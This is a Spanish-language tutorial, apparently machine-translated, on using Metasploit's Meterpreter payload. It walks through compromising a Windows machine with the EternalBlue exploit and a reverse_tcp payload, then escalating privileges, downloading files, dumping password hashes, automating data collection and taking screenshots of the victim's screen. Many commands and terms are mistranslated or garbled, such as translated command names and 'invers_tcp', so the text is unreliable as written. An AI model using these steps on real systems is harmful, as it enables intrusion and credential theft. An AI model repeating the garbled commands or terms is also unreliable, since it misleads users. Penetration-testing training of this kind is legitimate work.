Introducción al meterpreter
Meterpreter es una carga útil de ataque en el marco de MetaSploit que permite al perpetrador controlar y navegar por la computadora víctima a través de un shell de comando. Puede demostrar ser una herramienta muy versátil cuando se trata de pruebas de penetración. Es una herramienta posterior a la explotación que se basa en la inyección de DLL en memoria, lo que significa que se ejecuta la DLL inyectada creando un nuevo proceso que requiere que el sistema ejecute el DLL inyectado. Puede darle acceso a un shell de comando invisible en una máquina víctima, permitiéndole ejecutar ejecutables y redes de perfil.
Originalmente fue escrito para Metasploit 2.x y se actualiza para MetaSploit 3.
Discutiremos los usos del meterpreter en detalle, pero antes de eso, hagamos una palabra sobre las cargas en general
¿Qué son las cargas útiles??
Las cargas útiles en MetaSploit son módulos, lo que significa que son fragmentos de códigos dentro de MetaSploit que se ejecutan en el sistema remoto que nos dirigimos. El módulo de exploit se envía primero, que instala el módulo de carga útil en el sistema. Luego, la carga útil otorga acceso al atacante (restringido o completo, depende del contenido de la carga útil). Para explicar aún más el funcionamiento de las cargas útiles, debemos discutir sus tipos, que son 3 en total:
Individual
Estas cargas útiles son completamente autónomas, lo que significa que estos pueden ser tan básicos como los códigos de Gatekeeper que permite al usuario entrar en un sistema de destino.
Decisores
Los decustores son cargas útiles que recopilan solicitudes dentro del sistema de destino y lo envían al atacante. Establece la conexión entre la víctima de nuestra máquina local.
Etapas
Una vez que las decisiones tienen acceso al sistema, descargan los módulos de etapas. Módulos de etapas Retire la tapa de tamaño del meterpreter.
Ejemplos de etapas serían un shell simple, shell 'ipwn' de iPhone, módulos meterpreter, inyección VNC.
Puede calcular el tipo de carga útil calculando su nombre. Las cargas útiles individuales suelen ser del formato /
Explotación con meterpreter
En primer lugar, inicie la consola MSF escribiendo el siguiente comando terminal en la ventana del terminal Kali.
$ sudo msfconsole
Estamos usando reverse_tcp como stager y meterpreter como la etapa.
Comenzaremos estableciendo el Eternal Blue Exploit. SELECT (MS17_010_ETERNALBLUE) y luego configure Windows/x64/meterpreter/invers_tcp como la carga útil seleccionada
A continuación, configure la configuración de exploit y luego ejecute el Comando Exploit con Exploit:
$ Establecer la carga útil Windows/x64/meterpreter/invers_tcp
$ set rhost 192.168.198.136
$ Exploit
El Exploit EternalBlue ha sido activado con éxito.
Posterior a la explotación
Accedemos y manipulamos el sistema ya comprometido durante la explotación posterior.
Podemos hacer muchas cosas ahora que tenemos acceso al sistema, pero como se mencionó anteriormente, debemos seguir enfocados principalmente en descargar información y obtener credenciales de usuario aquí
Administración de privilegios de acceso:
Dependiendo del módulo de carga útil y la exploit que haya utilizado, puede enfrentarse con ciertas restricciones de acceso que paralizarán severamente sus habilidades para maniobrar la máquina de la víctima. Puede evitar este problema con la escalada de privilegios mediante la eliminación de contraseñas y manipulación de los registros. También puede escalar privilegios utilizando el sistema Get System de Meterpreter.
$ GetSystem
$ getuid
Transferencia de archivos con meterpreter
Con Meterpreter, puede descargar un archivo usando el comando $ descargar-.
$ descargar/windows/system32/controladores/etc/hosts
Del mismo modo, también puede cargar información en la máquina, utilizando el comando $ cargada
Extracción de credenciales de usuario:
Use el script de código credencial_collector para extraer información de cuentas de usuario o use el módulo de publicación de volcado hash con un efecto similar.
Usaremos el módulo de post -dump de hash para continuar con la cosecha de las credenciales. Escriba el siguiente comando msf.
$ ejecutar post/windows/recolect/hashdump
Como podemos ver, hemos obtenido las cuentas de coen, invitado y administrador. El hash LM (administrador) y el hash (invitado) se refieren a contraseñas vacías, mientras que el hash Coen es una contraseña que necesitará descifrar. Puede hacerlo usando una galleta de contraseña.
Automatizar el raspado del sistema
Puede ser tedioso recopilar información con declaraciones de entrada individuales que debe seguir alimentando el shell de comando. Convenientemente, puede automatizar este proceso con script de viñum. El script recopila información de la víctima y descarga los datos en nuestra máquina local. Se le dirá dónde se guarda la salida, como puede ver en la cuarta línea desde arriba:
$ Run Wineum
Tenga en cuenta que la ruta donde se almacena la salida a cada comando puede ser diferente de la que se muestra aquí.
Vamos a perder un poco más
Ejecución de archivos
Puede ejecutar cualquier archivo en el sistema usando: ejecutar -f . Esto incluye tanto archivos ejecutables como programas con múltiples archivos de soporte. Por ejemplo, para ejecutar la aplicación de calculadora incorporada en el sistema operativo Windows, escriba ejecutar -f calc.exe
Tomar capturas de pantalla
También puede capturar capturas de pantalla desde el punto de vista del usuario. Simplemente escriba una captura de pantalla en el shell de comando del meterpreter, y obtendrá una captura de pantalla de la pantalla en el sistema.
$ ejecutar -f calc.exe
$ Captura de pantalla
Conclusión:
Esta ha sido una breve introducción al complemento de meterpreter en el marco de metasploit, junto con una guía corta que muestra sus usos más básicos. Hemos aprendido aquí cómo podemos violar un sistema de Windows OS con EternalBlue Exploit para obtener acceso, luego usar Meterpreter para aumentar los privilegios, recopilar información manualmente y al automatizar Vineus-Command. También hemos aprendido a ejecutar archivos en la máquina de víctimas.
Meterpreter puede servir como un medio apreciable de detección de vulnerabilidad, a pesar de ser un conglomerado de herramientas básicas dentro del marco de MetaSploit.